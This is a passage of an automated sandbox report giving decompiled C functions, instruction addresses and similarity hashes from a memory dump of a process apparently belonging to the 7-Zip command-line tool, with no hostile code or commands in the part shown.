                                                                                  0x004188f5
                                                                                  0x004188f8
                                                                                  0x004188fe
                                                                                  0x00418903
                                                                                  0x00418903
                                                                                  0x00418906
                                                                                  0x00418909
                                                                                  0x0041890f
                                                                                  0x00418914
                                                                                  0x00418914
                                                                                  0x00418917
                                                                                  0x00000000
                                                                                  0x00418917
                                                                                  0x00418787
                                                                                  0x0041878b
                                                                                  0x0041878c
                                                                                  0x00418792
                                                                                  0x00418796
                                                                                  0x0041891f
                                                                                  0x00418922
                                                                                  0x00418928
                                                                                  0x0041892d
                                                                                  0x0041892d
                                                                                  0x00418933
                                                                                  0x00418937
                                                                                  0x0041893c
                                                                                  0x0041893f
                                                                                  0x00418945
                                                                                  0x0041894a
                                                                                  0x0041894a
                                                                                  0x0041894d
                                                                                  0x00418950
                                                                                  0x00418956
                                                                                  0x0041895b
                                                                                  0x0041895b
                                                                                  0x0041895e
                                                                                  0x00418961
                                                                                  0x00418967
                                                                                  0x0041896c
                                                                                  0x0041896c
                                                                                  0x00000000
                                                                                  0x00418967
                                                                                  0x004187a2
                                                                                  0x004187a3
                                                                                  0x004187a8
                                                                                  0x004187ab
                                                                                  0x004187b1
                                                                                  0x004187b6
                                                                                  0x004187b6
                                                                                  0x004187bc
                                                                                  0x004187c0
                                                                                  0x004187c5
                                                                                  0x004187c8
                                                                                  0x004187ce
                                                                                  0x004187d3
                                                                                  0x004187d3
                                                                                  0x004187d6
                                                                                  0x004187d9
                                                                                  0x004187df
                                                                                  0x004187e4
                                                                                  0x004187e4
                                                                                  0x004187e7
                                                                                  0x004187ea
                                                                                  0x004187f0
                                                                                  0x004187f9
                                                                                  0x004187f9
                                                                                  0x00418586
                                                                                  0x00418586
                                                                                  0x0041858b
                                                                                  0x0041858c
                                                                                  0x0041858f
                                                                                  0x00418592
                                                                                  0x00418597
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00418597
                                                                                  0x00418586
                                                                                  0x00418774
                                                                                  0x004186fd
                                                                                  0x004186d5
                                                                                  0x004186b0
                                                                                  0x004185ce
                                                                                  0x004185dc
                                                                                  0x004185df
                                                                                  0x004185ed
                                                                                  0x004185ff
                                                                                  0x00418604
                                                                                  0x00418608
                                                                                  0x00418807
                                                                                  0x0041880a
                                                                                  0x00000000
                                                                                  0x0041880a
                                                                                  0x00418617
                                                                                  0x00418618
                                                                                  0x00418623
                                                                                  0x00418626
                                                                                  0x00000000
                                                                                  0x004185b5
                                                                                  0x004185b8
                                                                                  0x004185be
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004185be
                                                                                  0x0041857a
                                                                                  0x0041857a
                                                                                  0x004189a8
                                                                                  0x004189ae
                                                                                  0x004189b6
                                                                                  0x004189b6

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 9050f88662f4097002547820e55f795195db55768dbf18950763ce4779865bc7
                                                                                  • Instruction ID: 76bd23d462c274ce260ddb573aa15372642f75ed32e5dbe225ef9e2e1f132d85
                                                                                  • Opcode Fuzzy Hash: 9050f88662f4097002547820e55f795195db55768dbf18950763ce4779865bc7
                                                                                  • Instruction Fuzzy Hash: 3CE15D70900249DFCF10DFA4C884AEEBBB5EF49314F2445AEE559E7291CB389E85CB16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0042B338 Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 89%
                                                                                  			E0042B338() {
				intOrPtr _t70;
				intOrPtr* _t72;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr _t82;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr* _t92;
				void* _t100;
				intOrPtr* _t101;
				void* _t125;
				void* _t129;
				intOrPtr* _t130;
				intOrPtr* _t132;
				void* _t134;
				void* _t136;

				L0046B890(0x47718c, _t134);
				_t101 =  *((intOrPtr*)(_t134 + 8));
				 *((intOrPtr*)(_t134 - 0x10)) = _t136 - 0x68;
				 *(_t134 - 4) = 0;
				 *((intOrPtr*)( *_t101 + 0x10))(_t101, _t125, _t129, _t100);
				E0040862D();
				_t130 =  *((intOrPtr*)(_t134 + 0x14));
				 *(_t134 - 4) = 1;
				 *((intOrPtr*)(_t134 - 0x18)) = _t130;
				if(_t130 != 0) {
					 *((intOrPtr*)( *_t130 + 4))(_t130);
				}
				 *((intOrPtr*)(_t134 - 0x14)) = 0;
				_t140 = _t130;
				 *(_t134 - 4) = 3;
				if(_t130 != 0) {
					 *((intOrPtr*)( *_t130))(_t130, 0x47a578, _t134 - 0x14);
				}
				 *((intOrPtr*)(_t134 - 0x74)) = 0;
				 *(_t134 - 4) = 4;
				E00405B9F(_t134 - 0x70);
				 *((intOrPtr*)(_t134 - 0x70)) = 0x47b3b8;
				_push( *((intOrPtr*)(_t134 + 0x10)));
				 *(_t134 - 4) = 5;
				_t70 = E0042D57A(_t134 - 0x74, _t134, _t140,  *((intOrPtr*)(_t134 + 0xc)));
				_t141 = _t70;
				 *((intOrPtr*)(_t134 + 0x10)) = _t70;
				if(_t70 == 0) {
					 *(_t101 + 0x240) =  *(_t101 + 0x240) & 0x00000000;
					 *((intOrPtr*)(_t134 - 0x24)) = 0;
					 *((intOrPtr*)(_t134 - 0x20)) = 0;
					 *((intOrPtr*)(_t134 - 0x1c)) = 0;
					E00401E9A(_t134 - 0x24, 3);
					_push(_t101 + 0x240);
					_t127 = _t101 + 0x70;
					_push( *((intOrPtr*)(_t134 - 0x14)));
					 *(_t134 - 4) = 6;
					_push(_t101 + 0x70); // executed
					_t72 = E0042F024(_t134 - 0x74, __eflags); // executed
					_t132 = _t72;
					__eflags = _t132;
					if(__eflags == 0) {
						L0042EAEC(_t127);
						L0042EB2E();
						L0042EB83(_t127);
						E0040C9B4(_t101 + 0x6c,  *((intOrPtr*)(_t134 + 0xc)));
						L00407A18( *((intOrPtr*)(_t134 - 0x24)));
						 *(_t134 - 4) = 3;
						L0042B501(_t134 - 0x74, __eflags);
						_t79 =  *((intOrPtr*)(_t134 - 0x14));
						 *(_t134 - 4) = 2;
						__eflags = _t79;
						if(_t79 != 0) {
							 *((intOrPtr*)( *_t79 + 8))(_t79);
						}
						_t80 =  *((intOrPtr*)(_t134 + 0x14));
						 *(_t134 - 4) = 1;
						__eflags = _t80;
						if(__eflags != 0) {
							 *((intOrPtr*)( *_t80 + 8))(_t80);
						}
						 *(_t134 - 4) =  *(_t134 - 4) & 0x00000000;
						E00430B45(_t101, __eflags);
						_t82 = 0;
					} else {
						L00407A18( *((intOrPtr*)(_t134 - 0x24)));
						 *(_t134 - 4) = 3;
						L0042B501(_t134 - 0x74, __eflags);
						_t87 =  *((intOrPtr*)(_t134 - 0x14));
						 *(_t134 - 4) = 2;
						__eflags = _t87;
						if(_t87 != 0) {
							 *((intOrPtr*)( *_t87 + 8))(_t87);
						}
						_t88 =  *((intOrPtr*)(_t134 + 0x14));
						 *(_t134 - 4) = 1;
						__eflags = _t88;
						if(_t88 != 0) {
							 *((intOrPtr*)( *_t88 + 8))(_t88);
						}
						_t82 = _t132;
					}
				} else {
					 *(_t134 - 4) = 3;
					L0042B501(_t134 - 0x74, _t141);
					_t92 =  *((intOrPtr*)(_t134 - 0x14));
					 *(_t134 - 4) = 2;
					if(_t92 != 0) {
						 *((intOrPtr*)( *_t92 + 8))(_t92);
					}
					 *(_t134 - 4) = 1;
					if(_t130 != 0) {
						 *((intOrPtr*)( *_t130 + 8))(_t130);
					}
					_t82 =  *((intOrPtr*)(_t134 + 0x10));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t134 - 0xc));
				return _t82;
			}



















                                                                                  0x0042b33d
                                                                                  0x0042b346
                                                                                  0x0042b34d
                                                                                  0x0042b353
                                                                                  0x0042b356
                                                                                  0x0042b35f
                                                                                  0x0042b364
                                                                                  0x0042b367
                                                                                  0x0042b36d
                                                                                  0x0042b370
                                                                                  0x0042b375
                                                                                  0x0042b375
                                                                                  0x0042b378
                                                                                  0x0042b37b
                                                                                  0x0042b37d
                                                                                  0x0042b381
                                                                                  0x0042b38f
                                                                                  0x0042b38f
                                                                                  0x0042b391
                                                                                  0x0042b397
                                                                                  0x0042b39b
                                                                                  0x0042b3a0
                                                                                  0x0042b3a7
                                                                                  0x0042b3ad
                                                                                  0x0042b3b4
                                                                                  0x0042b3b9
                                                                                  0x0042b3bb
                                                                                  0x0042b3be
                                                                                  0x0042b3f3
                                                                                  0x0042b405
                                                                                  0x0042b408
                                                                                  0x0042b40b
                                                                                  0x0042b40e
                                                                                  0x0042b413
                                                                                  0x0042b414
                                                                                  0x0042b417
                                                                                  0x0042b41d
                                                                                  0x0042b421
                                                                                  0x0042b422
                                                                                  0x0042b427
                                                                                  0x0042b429
                                                                                  0x0042b42b
                                                                                  0x0042b46d
                                                                                  0x0042b474
                                                                                  0x0042b47b
                                                                                  0x0042b486
                                                                                  0x0042b48e
                                                                                  0x0042b494
                                                                                  0x0042b49b
                                                                                  0x0042b4a0
                                                                                  0x0042b4a3
                                                                                  0x0042b4a7
                                                                                  0x0042b4a9
                                                                                  0x0042b4ae
                                                                                  0x0042b4ae
                                                                                  0x0042b4b1
                                                                                  0x0042b4b4
                                                                                  0x0042b4b8
                                                                                  0x0042b4ba
                                                                                  0x0042b4bf
                                                                                  0x0042b4bf
                                                                                  0x0042b4c2
                                                                                  0x0042b4c8
                                                                                  0x0042b4cd
                                                                                  0x0042b42d
                                                                                  0x0042b430
                                                                                  0x0042b436
                                                                                  0x0042b43d
                                                                                  0x0042b442
                                                                                  0x0042b445
                                                                                  0x0042b449
                                                                                  0x0042b44b
                                                                                  0x0042b450
                                                                                  0x0042b450
                                                                                  0x0042b453
                                                                                  0x0042b456
                                                                                  0x0042b45a
                                                                                  0x0042b45c
                                                                                  0x0042b461
                                                                                  0x0042b461
                                                                                  0x0042b464
                                                                                  0x0042b464
                                                                                  0x0042b3c0
                                                                                  0x0042b3c3
                                                                                  0x0042b3c7
                                                                                  0x0042b3cc
                                                                                  0x0042b3cf
                                                                                  0x0042b3d5
                                                                                  0x0042b3da
                                                                                  0x0042b3da
                                                                                  0x0042b3df
                                                                                  0x0042b3e3
                                                                                  0x0042b3e8
                                                                                  0x0042b3e8
                                                                                  0x0042b3eb
                                                                                  0x0042b3eb
                                                                                  0x0042b4f5
                                                                                  0x0042b4fe

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0042B33D
                                                                                    • Part of subcall function 0042F024: __EH_prolog.LIBCMT ref: 0042F029
                                                                                    • Part of subcall function 0042B501: __EH_prolog.LIBCMT ref: 0042B506
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: cdbfe49c50f0ef098f8cc0fed68cf8632f5982a1bffcf80b3caf0fe23c254c9c
                                                                                  • Instruction ID: 5cb2430fb4dc953f393a3ee5c8d9f9ed3e7e4da21bbd91b41222667785b49699
                                                                                  • Opcode Fuzzy Hash: cdbfe49c50f0ef098f8cc0fed68cf8632f5982a1bffcf80b3caf0fe23c254c9c
                                                                                  • Instruction Fuzzy Hash: 8551A130A00258DFCF11EFA5D9846EEBBB4EF54308F24409EE805A7352CB789E41DB65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00412DB2 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 95%
                                                                                  			E00412DB2(void* __ecx) {
				intOrPtr _t70;
				intOrPtr* _t71;
				void* _t72;
				intOrPtr* _t75;
				intOrPtr* _t76;
				intOrPtr _t79;
				intOrPtr* _t84;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t101;
				intOrPtr _t103;
				intOrPtr* _t112;
				intOrPtr* _t115;
				intOrPtr* _t118;
				intOrPtr _t120;
				void* _t121;
				intOrPtr _t123;

				L0046B890(E00474574, _t121);
				_push(__ecx);
				 *((intOrPtr*)(_t121 - 0x10)) = _t123;
				 *((intOrPtr*)(_t121 - 4)) = 0;
				if( *((intOrPtr*)(_t121 + 0xc)) < 0 ||  *((intOrPtr*)(_t121 + 0xc)) > 3) {
					_t70 =  *((intOrPtr*)(_t121 + 8));
					_t118 = _t70 + 0x98;
					_t71 =  *((intOrPtr*)(_t70 + 0x98));
					__eflags = _t71;
					if(_t71 != 0) {
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						 *_t118 = 0;
					}
					_t72 = 0x80004005;
					goto L36;
				} else {
					_t120 =  *((intOrPtr*)(_t121 + 8));
					if( *((intOrPtr*)(_t120 + 0xa0)) != 0) {
						_t87 =  *((intOrPtr*)(_t120 + 0x9c));
						 *((intOrPtr*)(_t120 + 0xf0)) =  *((intOrPtr*)(_t120 + 0xf0)) +  !( *(_t87 + 0x18));
						 *((intOrPtr*)(_t120 + 0x88)) =  *((intOrPtr*)(_t87 + 0x10));
						 *((intOrPtr*)(_t120 + 0x8c)) =  *((intOrPtr*)(_t87 + 0x14));
						 *((char*)(_t120 + 0x90)) = 1;
						_t89 =  *((intOrPtr*)(_t120 + 0xa0));
						if(_t89 != 0) {
							 *((intOrPtr*)( *_t89 + 8))(_t89);
							 *((intOrPtr*)(_t120 + 0xa0)) = 0;
						}
					}
					if( *((intOrPtr*)(_t120 + 0x98)) == 0) {
						L24:
						_t115 = _t120 + 0x90;
						if( *((intOrPtr*)(_t120 + 0x90)) != 0) {
							L26:
							 *((intOrPtr*)(_t120 + 0xe8)) =  *((intOrPtr*)(_t120 + 0xe8)) +  *((intOrPtr*)(_t120 + 0x88));
							asm("adc [eax+0x4], edx");
							L27:
							_t75 = _t120 + 0xd8;
							if( *((intOrPtr*)(_t120 + 0x80)) == 0) {
								_t75 = _t120 + 0xe0;
							}
							 *_t75 =  *_t75 + 1;
							asm("adc [eax+0x4], ebx");
							if( *((intOrPtr*)(_t120 + 0x59)) != 0 &&  *((intOrPtr*)(_t120 + 0x7f)) != 0) {
								E00409A29( *((intOrPtr*)(_t120 + 0x38)),  *((intOrPtr*)(_t120 + 0x78))); // executed
							}
							_t76 =  *((intOrPtr*)(_t120 + 0x18));
							_t72 =  *((intOrPtr*)( *_t76 + 0x20))(_t76,  *((intOrPtr*)(_t121 + 0xc)),  *((intOrPtr*)(_t120 + 0x5d)));
							L36:
							 *[fs:0x0] =  *((intOrPtr*)(_t121 - 0xc));
							return _t72;
						}
						E00411FA9(_t120);
						if( *_t115 == 0) {
							goto L27;
						}
						goto L26;
					}
					if( *((intOrPtr*)(_t120 + 0x5c)) == 0 ||  *((intOrPtr*)(_t120 + 0x7e)) == 0) {
						_t79 =  *((intOrPtr*)(_t120 + 0x10));
						__eflags =  *((intOrPtr*)(_t79 + 0x2c));
						if(__eflags == 0) {
							 *((intOrPtr*)(_t121 + 8)) = 0;
							goto L13;
						}
						_t86 = _t79 + 0x24;
						goto L9;
					} else {
						_t86 = _t120 + 0x70;
						L9:
						 *((intOrPtr*)(_t121 + 8)) = _t86;
						L13:
						if( *((intOrPtr*)(_t120 + 0x5b)) == 0 ||  *((intOrPtr*)(_t120 + 0x7d)) == 0) {
							_t112 = 0;
							__eflags = 0;
						} else {
							_t112 = _t120 + 0x68;
						}
						if( *((intOrPtr*)(_t120 + 0x5a)) == 0) {
							L20:
							_t101 = 0;
							__eflags = 0;
							goto L21;
						} else {
							_t135 =  *((intOrPtr*)(_t120 + 0x7c));
							if( *((intOrPtr*)(_t120 + 0x7c)) == 0) {
								goto L20;
							}
							_t101 = _t120 + 0x60;
							L21:
							E0040BD82( *((intOrPtr*)(_t120 + 0x94)) + 8, _t101, _t112,  *((intOrPtr*)(_t121 + 8)));
							_t103 =  *((intOrPtr*)(_t120 + 0x94));
							 *((intOrPtr*)(_t120 + 0x88)) =  *((intOrPtr*)(_t103 + 0x18));
							 *((intOrPtr*)(_t120 + 0x8c)) =  *((intOrPtr*)(_t103 + 0x1c));
							 *((char*)(_t120 + 0x90)) = 1;
							_t72 = E0040D3F3(_t103, _t135);
							if(_t72 != 0) {
								goto L36;
							}
							_t84 =  *((intOrPtr*)(_t120 + 0x98));
							if(_t84 != 0) {
								 *((intOrPtr*)( *_t84 + 8))(_t84);
								 *((intOrPtr*)(_t120 + 0x98)) = 0;
							}
							goto L24;
						}
					}
				}
			}





















                                                                                  0x00412db7
                                                                                  0x00412dbc
                                                                                  0x00412dc5
                                                                                  0x00412dc8
                                                                                  0x00412dcb
                                                                                  0x00412f42
                                                                                  0x00412f45
                                                                                  0x00412f4b
                                                                                  0x00412f51
                                                                                  0x00412f53
                                                                                  0x00412f58
                                                                                  0x00412f5b
                                                                                  0x00412f5b
                                                                                  0x00412f5d
                                                                                  0x00000000
                                                                                  0x00412ddb
                                                                                  0x00412ddb
                                                                                  0x00412de4
                                                                                  0x00412de6
                                                                                  0x00412df1
                                                                                  0x00412dfd
                                                                                  0x00412e03
                                                                                  0x00412e09
                                                                                  0x00412e10
                                                                                  0x00412e18
                                                                                  0x00412e1d
                                                                                  0x00412e20
                                                                                  0x00412e20
                                                                                  0x00412e18
                                                                                  0x00412e2c
                                                                                  0x00412ecd
                                                                                  0x00412ed3
                                                                                  0x00412ed9
                                                                                  0x00412ee6
                                                                                  0x00412ef2
                                                                                  0x00412efe
                                                                                  0x00412f01
                                                                                  0x00412f07
                                                                                  0x00412f0d
                                                                                  0x00412f0f
                                                                                  0x00412f0f
                                                                                  0x00412f15
                                                                                  0x00412f18
                                                                                  0x00412f1e
                                                                                  0x00412f2b
                                                                                  0x00412f2b
                                                                                  0x00412f33
                                                                                  0x00412f3d
                                                                                  0x00412f62
                                                                                  0x00412f67
                                                                                  0x00412f70
                                                                                  0x00412f70
                                                                                  0x00412edd
                                                                                  0x00412ee4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00412ee4
                                                                                  0x00412e35
                                                                                  0x00412e44
                                                                                  0x00412e47
                                                                                  0x00412e4a
                                                                                  0x00412e51
                                                                                  0x00000000
                                                                                  0x00412e51
                                                                                  0x00412e4c
                                                                                  0x00000000
                                                                                  0x00412e3c
                                                                                  0x00412e3c
                                                                                  0x00412e3f
                                                                                  0x00412e3f
                                                                                  0x00412e54
                                                                                  0x00412e57
                                                                                  0x00412e63
                                                                                  0x00412e63
                                                                                  0x00412e5e
                                                                                  0x00412e5e
                                                                                  0x00412e5e
                                                                                  0x00412e68
                                                                                  0x00412e74
                                                                                  0x00412e74
                                                                                  0x00412e74
                                                                                  0x00000000
                                                                                  0x00412e6a
                                                                                  0x00412e6a
                                                                                  0x00412e6d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00412e6f
                                                                                  0x00412e76
                                                                                  0x00412e8a
                                                                                  0x00412e8f
                                                                                  0x00412e94
                                                                                  0x00412e9d
                                                                                  0x00412ea3
                                                                                  0x00412eaa
                                                                                  0x00412eb1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00412eb7
                                                                                  0x00412ebf
                                                                                  0x00412ec4
                                                                                  0x00412ec7
                                                                                  0x00412ec7
                                                                                  0x00000000
                                                                                  0x00412ebf
                                                                                  0x00412e68
                                                                                  0x00412e35

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: a6921194d0c3b171961f7e2d0d4fab16f42526df81de7e47b1bf747543ff3b15
                                                                                  • Instruction ID: 07fe3d3cc5dbb80cfcc1b2f20c161f072f6c6ff10f75d1b6cf221e6a487779e4
                                                                                  • Opcode Fuzzy Hash: a6921194d0c3b171961f7e2d0d4fab16f42526df81de7e47b1bf747543ff3b15
                                                                                  • Instruction Fuzzy Hash: CC513775600B80DFD725CF24C590BA7BBE1BB45304F08886EE49ACB312D775A99ADB14
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0042A0B8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E0042A0B8(void* __ecx) {
				intOrPtr _t59;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr _t64;
				intOrPtr* _t66;
				intOrPtr _t68;
				intOrPtr* _t69;
				intOrPtr _t70;
				intOrPtr* _t72;
				intOrPtr _t83;
				signed int _t97;
				void* _t100;
				intOrPtr* _t101;
				intOrPtr _t102;
				void* _t104;

				L0046B890(0x476e40, _t104);
				_t100 = __ecx;
				_t59 =  *((intOrPtr*)(__ecx + 0x28));
				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x18)) + 0xc)) + _t59)) == 0) {
					 *(_t104 - 0x10) = 2;
				} else {
					 *(_t104 - 0x10) = 0 |  *((intOrPtr*)(__ecx + 0x2c)) != 0x00000000;
				}
				 *((intOrPtr*)(_t104 - 0x14)) = 0;
				_t97 =  *((intOrPtr*)(_t100 + 0x24)) + _t59;
				_t60 =  *((intOrPtr*)(_t100 + 0x1c));
				 *(_t104 - 4) = 0;
				_t61 =  *((intOrPtr*)( *_t60 + 0x14))(_t60,  *((intOrPtr*)(_t100 + 0x20)) + _t97, _t104 - 0x14,  *(_t104 - 0x10));
				 *((intOrPtr*)(_t104 - 0x18)) = _t61;
				if(_t61 == 0) {
					E0040C9B4( *((intOrPtr*)(_t100 + 0xc)) + 8,  *((intOrPtr*)(_t104 - 0x14)));
					_t64 =  *((intOrPtr*)(_t100 + 0xc));
					 *(_t64 + 0x18) =  *(_t64 + 0x18) | 0xffffffff;
					 *((intOrPtr*)(_t64 + 0x10)) = 0;
					 *((intOrPtr*)(_t64 + 0x14)) = 0;
					 *((char*)(_t64 + 0x1c)) =  *((intOrPtr*)(_t100 + 0x2d));
					_t83 =  *((intOrPtr*)(_t100 + 0x14));
					 *((char*)(_t100 + 0x2e)) = 1;
					_t66 =  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x70)) + _t97 * 4));
					 *((intOrPtr*)(_t100 + 0x30)) =  *_t66;
					 *((intOrPtr*)(_t100 + 0x34)) =  *((intOrPtr*)(_t66 + 4));
					if( *(_t104 - 0x10) == 0 &&  *((intOrPtr*)(_t104 - 0x14)) == 0 && (_t97 >=  *((intOrPtr*)(_t83 + 0x120)) ||  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x124)) + _t97)) == 0) &&  *((intOrPtr*)(_t66 + 0x1d)) == 0) {
						 *(_t104 - 0x10) = 2;
					}
					_t101 =  *((intOrPtr*)(_t100 + 0x1c));
					_t68 =  *((intOrPtr*)( *_t101 + 0x18))(_t101,  *(_t104 - 0x10));
					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
					_t102 = _t68;
					_t69 =  *((intOrPtr*)(_t104 - 0x14));
					if(_t69 != 0) {
						 *((intOrPtr*)( *_t69 + 8))(_t69);
					}
					_t70 = _t102;
				} else {
					_t72 =  *((intOrPtr*)(_t104 - 0x14));
					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
					if(_t72 != 0) {
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t70 =  *((intOrPtr*)(_t104 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t104 - 0xc));
				return _t70;
			}


















                                                                                  0x0042a0bd
                                                                                  0x0042a0c7
                                                                                  0x0042a0cf
                                                                                  0x0042a0d8
                                                                                  0x0042a0e7
                                                                                  0x0042a0da
                                                                                  0x0042a0e2
                                                                                  0x0042a0e2
                                                                                  0x0042a0ee
                                                                                  0x0042a0fa
                                                                                  0x0042a0fc
                                                                                  0x0042a103
                                                                                  0x0042a10c
                                                                                  0x0042a111
                                                                                  0x0042a114
                                                                                  0x0042a138
                                                                                  0x0042a13d
                                                                                  0x0042a143
                                                                                  0x0042a147
                                                                                  0x0042a14a
                                                                                  0x0042a14d
                                                                                  0x0042a150
                                                                                  0x0042a153
                                                                                  0x0042a15d
                                                                                  0x0042a162
                                                                                  0x0042a168
                                                                                  0x0042a16b
                                                                                  0x0042a18a
                                                                                  0x0042a18a
                                                                                  0x0042a191
                                                                                  0x0042a19a
                                                                                  0x0042a19d
                                                                                  0x0042a1a1
                                                                                  0x0042a1a3
                                                                                  0x0042a1a8
                                                                                  0x0042a1ad
                                                                                  0x0042a1ad
                                                                                  0x0042a1b0
                                                                                  0x0042a116
                                                                                  0x0042a116
                                                                                  0x0042a119
                                                                                  0x0042a11f
                                                                                  0x0042a124
                                                                                  0x0042a124
                                                                                  0x0042a127
                                                                                  0x0042a127
                                                                                  0x0042a1b8
                                                                                  0x0042a1c0

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
